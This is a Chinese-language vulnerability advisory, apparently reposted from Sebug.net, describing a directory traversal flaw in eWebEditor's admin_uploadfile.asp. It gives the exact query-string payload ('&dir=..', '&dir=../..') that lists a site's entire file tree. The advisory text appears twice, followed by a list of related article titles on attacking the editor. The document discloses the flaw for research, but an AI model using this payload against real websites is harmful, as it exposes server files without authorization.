ewebeditor遍历路径漏洞
2008-07-30 21:52
696 查看
来源:Sebug.net
eWebEditor
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞
<* 参考:http://www.sebug.net,http://www.ewebeditor.net/ *>
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:暂无http://www.ewebeditor.net/
eWebEditor
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞
<* 参考:http://www.sebug.net,http://www.ewebeditor.net/ *>
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:暂无http://www.ewebeditor.net/
相关文章推荐
- ewebeditor遍历路径漏洞
- ewebeditor漏洞之目录遍历漏洞
- Ewebeditor最新漏洞及漏洞大全
- Ewebeditor最新漏洞和漏洞指数
- Ewebeditor最新漏洞及漏洞大全
- ewebeditor漏洞解決方法
- ewebeditor漏洞警惕大家注意
- 如何检查并堵住网站的eWebEditor漏洞
- 如何检查并堵住网站的eWebEditor漏洞
- Ewebeditor最新漏洞及漏洞大全
- eWebEditor漏洞之sql注入漏洞
- ewebeditor后台通杀漏洞
- 利用ewebeditor漏洞来攻击网站
- Cute Editor/Webhtmleditor/Kindeditor/Freetextbox网页编辑器漏洞手册
- Ewebeditor最新漏洞及漏洞大全
- 修复eWebEditor漏洞需要注意以下几个方面(大全总结)
- ewebeditor漏洞,ewebeditor漏洞攻击
- eWebEditor session欺骗漏洞
- php版ewebeditor 3.8的漏洞
- 关于eWebEditor编辑器漏洞